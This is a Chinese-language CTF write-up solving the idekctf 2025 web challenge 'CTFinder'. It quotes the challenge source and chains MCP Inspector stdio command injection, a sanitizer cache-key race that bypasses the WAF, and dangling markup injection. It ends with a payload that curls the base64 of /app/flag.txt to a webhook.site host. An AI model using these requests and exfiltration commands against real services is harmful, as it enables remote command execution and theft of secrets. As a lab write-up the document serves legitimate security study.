悬空标记攻击 -- idekctf 2025 CTFinder
generate_key 只取前128位,且其时间单位最小是秒,这给了我们利用条件竞争的机会,让两个有效负载命中同一个缓存键来绕过waf。但是如果我们注入具有相同元素 ID 的链接,机器人会点击我们的链接,重定向到我们想要的任何地方。Transport Type 选择 STDIO 的时观察到前端发送的参数被当作命令执行了。让更多的内容被认为是message user,包括那个按钮的属性!远程靶机并
题目信息
web/CTFinder
I made a chat service where you can have CTF related conversations using ctftime MCP!
Oh but it’s still in beta so I haven’t actually applied MCP to the service yet and am just testing… there shouldn’t be any problems right?
- MCP server may take some time to start up (3-5 seconds)
- Challenge can be solved without Claude API key
- Use “localhost” instead of container names in the instance server
part 1
首先flag在mpc server里,先研究怎么从这个容器取flag
发现开了个调试页面
mcp-server-1 | Spawned stdio transport
mcp-server-1 | Connected MCP client to backing server transport
mcp-server-1 | Created web app transport
mcp-server-1 | Set up MCP proxy
mcp-server-1 | 🔍 MCP Inspector is up and running at http://127.0.0.1:6274 🚀
Transport Type 选择 STDIO 的时观察到前端发送的参数被当作命令执行了
mcp-server-1 | New connection
mcp-server-1 | Query parameters: [Object: null prototype] {
mcp-server-1 | command: 'python',
mcp-server-1 | args: '-c "import json,sys;print(json.dumps({\\"result\\":sys.stdin.read()}))"',
mcp-server-1 | env: '{"HOME":"/home/mcpuser","PATH":"/tmp/.npm-cache/_npx/1d40d075a5198d81/node_modules/.bin:/app/node_modules/.bin:/node_modules/.bin:/usr/lib/node_modules/npm/node_modules/@npmcli/run-script/lib/node-gyp-bin:/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"}',
mcp-server-1 | transportType: 'stdio'
mcp-server-1 | }
mcp-server-1 | Stdio transport: command=/usr/local/bin/python, args=-c,import json,sys;print(json.dumps({"result":sys.stdin.read()}))
mcp-server-1 | Spawned stdio transport
mcp-server-1 | Connected MCP client to backing server transport
mcp-server-1 | Created web app transport
接下来我们只需要让其结果作为错误抛出即可
GET /stdio?command=/bin/sh&args=-c 'echo "FLAG:$(cat /app/flag.txt)" 1>&2; exit 1'&env={"HOME":"/home/mcpuser","PATH":"/tmp/.npm-cache/_npx/1d40d075a5198d81/node_modules/.bin:/app/node_modules/.bin:/node_modules/.bin:/usr/lib/node_modules/npm/node_modules/@npmcli/run-script/lib/node-gyp-bin:/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"}&transportType=stdio HTTP/1.1
Host: 192.168.6.133:6277
Accept-Language: zh-CN,zh;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Accept: */*
Origin: http://192.168.6.133:6274
Referer: http://192.168.6.133:6274/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: mcp-session-id
Content-Type: text/event-stream
Cache-Control: no-cache, no-transform
Connection: keep-alive
Date: Sat, 09 Aug 2025 14:13:25 GMT
Content-Length: 197
event: endpoint
data: /message?sessionId=0f04405f-64c0-4fba-9272-d9076e029218
event: message
data: {"jsonrpc":"2.0","method":"notifications/stderr","params":{"content":"FLAG:idek{fake-flag}\n"}}
远程靶机并不开放此端口,看来下一步我们需要想办法访问此端口
part 2
接下来我们该找到触发bot的方法
// 引入所需模块
const puppeteer = require("puppeteer-core");
const express = require("express");
const dotenv = require("dotenv");
const crypto = require("crypto");
// 加载环境变量
dotenv.config();
const app = express();
// 从环境变量中获取管理员用户名、密码和报告密钥
const ADMIN_USERNAME = process.env.ADMIN_USERNAME;
const ADMIN_PASSWORD = process.env.ADMIN_PASSWORD;
const REPORT_KEY = process.env.REPORT_KEY;
/**
* 让 bot 访问指定 URL 并执行相关操作
* @param {string} url - 需要访问的 URL
* @param {string} report_id - 报告 ID
*/
const visit = async (url, report_id) => {
let browser;
try {
// 启动 Puppeteer 浏览器
browser = await puppeteer.launch({
headless: "new",
executablePath: "/usr/bin/google-chrome",
args: [
"--no-sandbox",
"--disable-dev-shm-usage",
"--disable-gpu",
"--incognito",
"--js-flags=--noexpose_wasm,--jitless",
"--disable-web-security",
],
});
// 新建页面
let page = await browser.newPage();
// 访问登录页面
await page.goto(`http://main:1337/auth/login`, {
timeout: 5000,
waitUntil: "domcontentloaded",
});
// 填写用户名和密码并点击登录按钮
await page.evaluate(
(ADMIN_USERNAME, ADMIN_PASSWORD) => {
document.querySelector("#username").value = ADMIN_USERNAME;
document.querySelector("#password").value = ADMIN_PASSWORD;
document.querySelector("#loginBtn").click();
},
ADMIN_USERNAME,
ADMIN_PASSWORD
);
// 等待页面跳转
await page.waitForNavigation({
timeout: 5000,
waitUntil: "domcontentloaded"
});
// 访问目标 URL
await page.goto(url, {
timeout: 5000,
waitUntil: "domcontentloaded",
});
// 移除 meta refresh,防止自动跳转
await page.evaluate(() => {
document.querySelectorAll('meta[http-equiv]').forEach(el => {
if (el.getAttribute('http-equiv').toLowerCase() === 'refresh') {
el.remove();
}
});
window.stop();
});
// 等待 2 秒
await page.waitForTimeout(2000);
// 点击报告检查按钮
await page.evaluate((report_id) => {
const btn = document.querySelector(`#checkReportBtn-${report_id}`);
if (btn) btn.click();
}, report_id);
// 再等待 2 秒
await page.waitForTimeout(2000);
// 注销登录
await page.goto(`http://main:1337/auth/logout`, {
timeout: 5000,
waitUntil: "domcontentloaded",
});
// 再等待 2 秒
await page.waitForTimeout(2000);
// 关闭页面和浏览器
await page.close();
await browser.close();
browser = null;
} catch (err) {
console.log("bot 错误", err);
} finally {
if (browser) await browser.close();
}
};
/**
* 处理 GET / 请求,参数为 session_id 和 user_id
*/
app.get("/", async (req, res) => {
const session_id = req.query.session_id;
const user_id = req.query.user_id;
// 检查参数
if (!session_id || !user_id) {
return res.status(400).json({ error: "必须提供 session_id 和 user_id" });
}
// 生成 report_id
const report_id = crypto.createHash("sha256")
.update(`${session_id}:${user_id}:${REPORT_KEY}`)
.digest("hex")
.slice(0, 7);
// 构造目标 URL
const url = `http://main:1337/sessions/${session_id}?user_id=${user_id}&report_id=${report_id}`;
// 让 bot 访问
await visit(url, report_id);
res.json({ message: "Bot 已访问指定 URL" });
});
// 启动服务
app.listen(5010, () => {
console.log("Bot 正在 5010 端口运行");
});
bot运行在5010,接下来寻找调用此端口服务的地方
# 获取会话报告,并通知bot访问
@session_bp.route('/<session_id>/report', methods=['GET'])
@login_required
@token_required
def get_report(session_id):
user_id = flask_session['user_id']
redis = get_redis()
report = redis.get(f"session:{session_id}:{user_id}:report")
if not report:
return jsonify({'error': 'No report found'}), 404
# 通知bot访问
res = requests.get(f"http://bot:5010/?session_id={session_id}&user_id={user_id}")
if res.json().get('message') != "Bot visited the URL":
return jsonify({'error': 'Failed to get report'}), 400
# 删除报告缓存
redis.delete(f"session:{session_id}:{user_id}:report")
return jsonify({'message': 'Report sent'}), 200
接下来寻找什么地方储存了
...report
def stream_claude_response(app, session_id, user_id, content, parent_message_id, stream_channel):
with app.app_context():
# 获取会话历史
conversation_history = get_conversation_history(session_id, user_id)
# 获取用户的API密钥
api_key = get_token_by_user_id(user_id)
# 构造请求头
headers = {
"x-api-key": api_key,
"anthropic-version": "2023-06-01",
"content-type": "application/json"
}
# 构造请求体
request_body = {
"model": "claude-3-5-haiku-latest",
"max_tokens": 4000,
"messages": conversation_history + [{"role": "user", "content": content}],
"stream": True
}
redis = get_redis()
# 生成助手消息ID
assistant_message_id = str(uuid.uuid4())
# 向Anthropic Claude API发起POST请求,开启流式响应
response = requests.post(
"https://api.anthropic.com/v1/messages",
headers=headers,
json=request_body,
stream=True
)
# 如果响应不正常,处理错误
if not response.ok:
error_message = f"Claude API Error: HTTP {response.status_code}"
try:
error_data = response.json()
# 如果有详细错误信息,拼接到错误消息中
if 'error' in error_data:
error_message += f" - {error_data['error']['message']}"
except:
pass
# 向前端推送错误事件
redis.publish(stream_channel, json.dumps({
"event": "error",
"message": "Error streaming response",
"status_code": 500
}))
# 设置会话报告,供后续bot访问
redis.set(f"session:{session_id}:{user_id}:report", json.dumps({
"event": "error",
"meta": json.loads(redis.get(stream_channel.replace('stream', 'meta'))),
"message_id": assistant_message_id,
"message": error_message
}))
# 清理meta和stream通道
redis.delete(stream_channel.replace('stream', 'meta'))
redis.delete(stream_channel)
return
# 用于存储完整回复内容
full_content = ""
# 记录token数量
token_count = 0
# 向前端推送开始事件
redis.publish(stream_channel, json.dumps({
"event": "start",
"message_id": assistant_message_id,
"parent_id": parent_message_id
}))
# 逐行读取Claude的流式响应
for line in response.iter_lines():
if line:
line_text = line.decode('utf-8')
# 只处理以"data: "开头的行
if line_text.startswith('data: '):
line_data = json.loads(line_text[6:])
# 只处理内容块增量
if 'type' in line_data and line_data['type'] == 'content_block_delta':
content_delta = line_data['delta']['text']
# 对内容进行HTML转义
content_delta = html.escape(content_delta)
# 拼接到完整内容
full_content += content_delta
token_count += 1
# 推送内容块到前端
redis.publish(stream_channel, json.dumps({
"event": "chunk",
"message_id": assistant_message_id,
"content": content_delta
}))
# 推送完整内容到前端
redis.publish(stream_channel, json.dumps({
"event": "complete",
"message_id": assistant_message_id,
"content": full_content
}))
# 对完整内容进行安全检查和清洗
sanitizer = Sanitizer(full_content)
if sanitizer.check(session_id, user_id):
full_content = sanitizer.sanitize()
# 获取meta数据
meta_data = json.loads(redis.get(stream_channel.replace('stream', 'meta')))
# 保存用户消息到数据库
save_message_to_db(session_id, user_id, parent_message_id, 'user', meta_data['content'], None, 0)
# 保存助手消息到数据库
save_message_to_db(session_id, user_id, assistant_message_id, 'assistant', full_content, parent_message_id, token_count)
# 清理meta和stream通道
redis.delete(stream_channel.replace('stream', 'meta'))
redis.delete(stream_channel)
寻找什么地方调用了get_report
@session_bp.route('/<session_id>/messages', methods=['POST'])
@login_required
@token_required
def create_message(session_id):
user_id = flask_session['user_id']
data = request.get_json()
if not data or not data.get('content'):
return jsonify({'error': 'content is required'}), 400
redis = get_redis()
# 如果报告未完成,不能发消息
if redis.get(f"session:{session_id}:{user_id}:report"):
return jsonify({'error': 'Report is not finished yet'}), 400
content = data.get('content')
# 内容安全检查
sanitizer = Sanitizer(content)
if sanitizer.check(session_id, user_id):
content = sanitizer.sanitize()
timestamp = int(time.time())
message_id = str(uuid.uuid4())
meta_cache_key = f'session:{session_id}:{user_id}:{timestamp}:meta'
stream_channel = f'session:{session_id}:{user_id}:{timestamp}:stream'
db = get_db()
cursor = db.execute(
'SELECT id FROM messages WHERE session_id = ?',
(session_id,)
).fetchone()
# 如果是新会话,自动用首条消息内容作为标题
if not cursor:
db.execute(
'UPDATE sessions SET title = ? WHERE id = ?',
(content[:20], session_id)
)
db.commit()
redis = get_redis()
redis.set(meta_cache_key, json.dumps({
'message_id': message_id,
'role': 'user',
'content': content,
'token_count': 0,
'parent_id': None,
'timestamp': timestamp
}), ex = 60 * 5)
# 启动后台线程处理Claude回复
thread = threading.Thread(
target=stream_claude_response,
args=(current_app._get_current_object(), session_id, user_id, content, message_id, stream_channel)
)
thread.daemon = True
thread.start()
return jsonify({
'message_id': message_id,
'status': 'processing',
'stream_channel': stream_channel,
'content': content
}), 202
part 3
接下来
http://main:1337/sessions/${session_id}?user_id=${user_id}&report_id=${report_id}的页面如何造成xss?
# 创建消息(用户发言)
@session_bp.route('/<session_id>/messages', methods=['POST'])
@login_required
@token_required
def create_message(session_id):
user_id = flask_session['user_id']
data = request.get_json()
if not data or not data.get('content'):
return jsonify({'error': 'content is required'}), 400
redis = get_redis()
# 如果报告未完成,不能发消息
if redis.get(f"session:{session_id}:{user_id}:report"):
return jsonify({'error': 'Report is not finished yet'}), 400
content = data.get('content')
# 内容安全检查
sanitizer = Sanitizer(content)
if sanitizer.check(session_id, user_id):
content = sanitizer.sanitize()
timestamp = int(time.time())
message_id = str(uuid.uuid4())
meta_cache_key = f'session:{session_id}:{user_id}:{timestamp}:meta'
stream_channel = f'session:{session_id}:{user_id}:{timestamp}:stream'
db = get_db()
cursor = db.execute(
'SELECT id FROM messages WHERE session_id = ?',
(session_id,)
).fetchone()
# 如果是新会话,自动用首条消息内容作为标题
if not cursor:
db.execute(
'UPDATE sessions SET title = ? WHERE id = ?',
(content[:20], session_id)
)
db.commit()
redis = get_redis()
redis.set(meta_cache_key, json.dumps({
'message_id': message_id,
'role': 'user',
'content': content,
'token_count': 0,
'parent_id': None,
'timestamp': timestamp
}), ex = 60 * 5)
# 启动后台线程处理Claude回复
thread = threading.Thread(
target=stream_claude_response,
args=(current_app._get_current_object(), session_id, user_id, content, message_id, stream_channel)
)
thread.daemon = True
thread.start()
return jsonify({
'message_id': message_id,
'status': 'processing',
'stream_channel': stream_channel,
'content': content
}), 202
我们在此处遇到了第一处waf
import time
import bleach
import hashlib
# 用于缓存内容安全检查结果,避免重复计算
sanitize_store = {}
class Sanitizer:
def __init__(self, content: str):
# 初始化,保存待检查的内容
self.content = content
def generate_key(self, session_id, user_id):
"""
生成唯一的哈希key,用于缓存本次内容的检查结果
:param session_id: 会话ID
:param user_id: 用户ID
:return: 哈希字符串
"""
global sanitize_store
# 取内容前128字符作为nonce
nonce = self.content[:128]
# 当前时间戳
timestamp = int(time.time())
# 拼接key
key = f"{session_id}:{user_id}:{nonce}:{timestamp}"
# 生成sha256哈希
hash = hashlib.sha256(key.encode()).hexdigest()
return hash
def check(self, session_id, user_id):
"""
检查内容中是否包含不安全字符
:param session_id: 会话ID
:param user_id: 用户ID
:return: True表示需要清洗,False表示安全
"""
global sanitize_store
hash = self.generate_key(session_id, user_id)
# 如果已经检查过,直接返回缓存结果
if hash in sanitize_store:
return sanitize_store[hash]
# 定义不安全字符列表
bad_chars = ['<', '>', '=', '!', '@', '#', '$', '%', '^', '&', '*', '(', ')', '[', ']', '{', '}', '|', '\\', '/', '?', ':', ';', '.', ',', '\'', '\"', '`', '~']
# 检查内容中是否包含不安全字符
for char in bad_chars:
if char in self.content:
sanitize_store[hash] = True
return True
# 没有发现不安全字符,缓存并返回False
sanitize_store[hash] = False
return False
def sanitize(self):
"""
对内容进行清洗,只允许部分HTML标签和属性
:return: 清洗后的内容
"""
# 允许的HTML标签
allowed_tags = ['p', 'strong', 'ul', 'ol', 'li', 'h1', 'h2', 'h3', 'h4', 'code']
# 允许的HTML属性
allowed_attrs = {
'*': ['class']
}
# 使用bleach进行内容清洗
return bleach.clean(self.content, tags=allowed_tags, attributes=allowed_attrs)
generate_key 只取前128位,且其时间单位最小是秒,这给了我们利用条件竞争的机会,让两个有效负载命中同一个缓存键来绕过waf
a = Thread(target=send_message, args=(sess, sid, 'A' * 128))
b = Thread(target=send_message, args=(sess, sid, 'A' * 128 + payload))
part 4
这仍不能被执行,其还有严格的CSP
csp_policy = (
"default-src 'self'; "
f"script-src 'self' 'nonce-{nonce}' https://cdn.tailwindcss.com; "
"style-src 'self' 'unsafe-inline' https://cdn.tailwindcss.com https://cdnjs.cloudflare.com; "
"font-src 'self' https://cdnjs.cloudflare.com; "
"img-src 'self'; "
"connect-src 'self'; "
"media-src 'self'; "
"worker-src 'self'; "
"child-src 'none'; "
"frame-src 'none'; "
"object-src 'none'; "
"base-uri 'self'; "
"form-action 'self'; "
"frame-ancestors 'none'; "
)
但是如果我们注入具有相同元素 ID 的链接,机器人会点击我们的链接,重定向到我们想要的任何地方。
await page.evaluate((report_id) => {
const btn = document.querySelector(`#checkReportBtn-${report_id}`);
if (btn) btn.click();
}, report_id);
part 5
审计html发现特殊功能
// 异步函数:保存报告日志
async function saveReportLog() {
// 获取消息容器中所有用户消息和消息对元素
const allMessages = messagesContainer.querySelectorAll('.message.user, .message-pair');
let userMessage = null;
// 从最新消息开始倒序查找用户消息
for (let i = allMessages.length - 1; i >= 0; i--) {
const messageElement = allMessages[i];
// 如果是独立的用户消息
if (messageElement.classList.contains('user')) {
const proseContent = messageElement.querySelector('.prose');
if (proseContent) {
// 获取消息内容并去除首尾空格
userMessage = proseContent.innerHTML.trim();
break;
}
}
// 如果是消息对(用户+AI的对话对)
if (messageElement.classList.contains('message-pair')) {
const userDiv = messageElement.querySelector('.justify-end .prose');
if (userDiv) {
// 获取用户消息内容并去除首尾空格
userMessage = userDiv.innerHTML.trim();
break;
}
}
}
// 如果没有找到用户消息,输出警告并返回
if (!userMessage) {
console.warn('未找到要保存报告日志的用户消息');
return;
}
// 对消息内容进行安全处理:
// 1. 移除换行符和制表符
// 2. 转义HTML特殊字符
userMessage = userMessage
.replace(/\n/g, '')
.replace(/\r/g, '')
.replace(/\t/g, '')
.replace(/</g, '<')
.replace(/>/g, '>');
try {
// 发送POST请求到服务器保存报告日志
const response = await fetch(`/admin/sessions/${currentSessionId}/report`, {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
credentials: 'same-origin',
body: JSON.stringify({
report_message: userMessage, // 处理后的用户消息
reporter_id: INITIAL_USER_DATA.user_id // 报告人ID
})
});
// 根据响应状态输出日志
if (response.ok) {
console.log('报告日志保存成功');
} else {
console.warn('报告日志保存失败:', response.status);
}
} catch (error) {
// 捕获并输出网络错误
console.error('管理员检查错误:', error);
}
}
跟进admin发现鉴权失误,任何人都可以查看日志
# 获取某个会话的举报日志,GET方法
@admin_bp.route('/sessions/<session_id>/report', methods=['GET'])
@login_required
def get_report_log(session_id):
user_id = flask_session['user_id'] # 当前用户ID
is_admin = flask_session['is_admin'] # 当前用户是否为管理员
db = get_db() # 获取数据库连接
# 查询该会话下的所有举报日志
report_logs = db.execute('SELECT * FROM report_logs WHERE session_id = ?', (session_id,)).fetchall()
if not report_logs:
# 如果没有举报日志,返回404
return jsonify({'error': 'No report logs found'}), 404
report_logs_json = []
for report_log in report_logs:
# 只有自己或管理员可以查看
if report_log['user_id'] == user_id or is_admin:
report_logs_json.append({
'id': report_log['id'],
'user_id': report_log['user_id'],
'session_id': report_log['session_id'],
'message_id': report_log['message_id'],
# 管理员可以看到举报内容,普通用户不能看到
'report_message': report_log['report_message'] if is_admin else "Cannot view report message"
})
return jsonify({'report_logs': report_logs_json}), 200
接下来我们需要利用悬挂标记注入(Dangling Markup Injection) 让更多的内容被认为是message user,包括那个按钮的属性!
<div class="message user"><div class="prose"><style>
<div class="prose prose-sm max-w-none text-white">
<div class="message user"><div class="prose"><style>
</div>
</div>
</div>
</div>
</div>
<div class="flex justify-start">
<div class="flex max-w-[80%] flex-row items-start space-x-3">
<div class="w-8 h-8 rounded-full flex items-center justify-center bg-claude-orange mr-3">
<i class="fas fa-robot text-white text-sm"></i>
</div>
<div class="flex-1">
<div class="bg-white border border-gray-200 rounded-2xl rounded-tl-md px-4 py-3">
<div class="prose prose-sm max-w-none text-gray-800">
<div class="text-red-500">
<p>
<strong>An error occurred.</strong>
<br>
Claude API Error: HTTP 403 - Request not allowed
</p>
<br>
<button id="checkReportBtn-481239b" class="bg-red-500 text-white px-4 py-2 rounded-md">
Check Report 481239b
</button>
<br><br>
<p class="text-sm">
<strong>'You cannot send new messages until you report.'</strong>
</p>
</div>
</div>
</div>
</div>
</div>
</div>
</style></div></div></div>
访问这里即可获取id
http://192.168.6.133:1337/admin/sessions/id/report
最后我们让其重定向执行任意命令带出
<a id="checkReportBtn-{id}" href="http://mcp-server:6277/sse?transportType=stdio&command=sh&args=-c%20%22curl%20https%3A//webhook.site/2c7d64f3-cd0a-42a5-8b32-b95e3f6b19aa%3Ff%3D%60cat%20/app/flag.txt%20%7C%20base64%20-w%200%60%22" />
更多推荐
所有评论(0)